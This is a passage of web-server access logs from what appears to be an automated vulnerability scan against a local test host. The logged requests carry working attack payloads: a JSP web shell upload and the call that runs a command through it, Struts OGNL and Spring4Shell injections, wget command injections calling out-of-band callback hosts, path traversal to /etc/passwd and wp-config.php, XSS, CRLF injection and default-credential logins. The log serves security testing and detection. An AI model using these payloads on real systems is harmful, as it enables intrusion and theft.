+0000","request_body":"more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"127.0.0.1/index.php?action=login.index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cluster/cluster HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/authportal/bounce.php?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/nodes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/scripts/login_par.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22public\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c9v8gc8smpv8b0ng0t00uhfua4181i4gh.oast.online%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c9v8gc8smpv8b0ng0t00tnn1oi7qn4ujx.oast.online%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /changePassword?username=administrator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://c9v8gc8smpv8b0ng0t00m4ngxr83zzgd9.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /telescope/requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV\x0D\x0AOPTION=S3WYOSWLBSGr\x0D\x0AcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\x0D\x0A= WUghPB3szB3Xwg66 the CREATEDATE\x0D\x0ArecordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6\x0D\x0AoriginalFileId = wV66\x0D\x0AoriginalCreateDate = wUghPB3szB3Xwg66\x0D\x0AFILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs\x0D\x0AneedReadFile = yRWZdAS6\x0D\x0AoriginalCreateDate IZ = 66 = = wLSGP4oEzLKAz4\x0D\x0A<%@ page language=\x22java\x22 import=\x22java.util.*,java.io.*\x22 pageEncoding=\x22UTF-8\x22%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+\x22\x5Cn\x22);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if(\x22x\x22.equals(request.getParameter(\x22pwd\x22))&&!\x22\x22.equals(request.getParameter(\x22297MFjbFY2DydBl1iY73nHN0XdR\x22))){out.println(\x22
\x22 +excuteCmd(request.getParameter(\x22297MFjbFY2DydBl1iY73nHN0XdR\x22)) + \x22
\x22);}else{out.println(\x22:-)\x22);}%>6e4f045d4b8506bf492ada7e3390d7ce","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seeyon/htmlofficeservlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://c9v8gc8smpv8b0ng0t00j88c7rehjr3id.oast.online; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.473","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.php?search=%22;wget+http%3A%2F%2Fc9v8gc8smpv8b0ng0t00t3xua1yq9hro9.oast.online%27;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"email=springbird@qq.com&password=springbird&remeber=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c9v8gc8smpv8b0ng0t00w6t7rp9d8p6as.oast.online%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c9v8gc8smpv8b0ng0t008mqjtn6d8p79z.oast.online%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://c9v8gc8smpv8b0ng0t001i56n4papp59x.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"class.module.classLoader.resources.context.configFile=https://c9v8gc8smpv8b0ng0t00om9fzcyar8u8q.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/test123456.jsp?pwd=asasd3344&297MFjbFY2DydBl1iY73nHN0XdR=ipconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vkd/GetWelcomeScreen.event HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 